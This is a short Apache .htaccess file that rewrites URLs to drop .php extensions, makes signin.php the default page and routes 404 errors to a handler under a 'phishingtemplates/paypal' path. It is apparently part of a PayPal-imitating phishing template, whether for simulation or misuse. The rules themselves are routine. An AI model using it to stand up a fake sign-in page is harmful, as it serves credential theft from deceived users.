# REMOVE .php / .html Extensions
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}\.php -f
RewriteRule ^(.*)$ $1.php [NC,L]

# set main page
DirectoryIndex signin.php

# Setting error document
ErrorDocument 404 /phishingtemplates/paypal/errorhandler/404.php
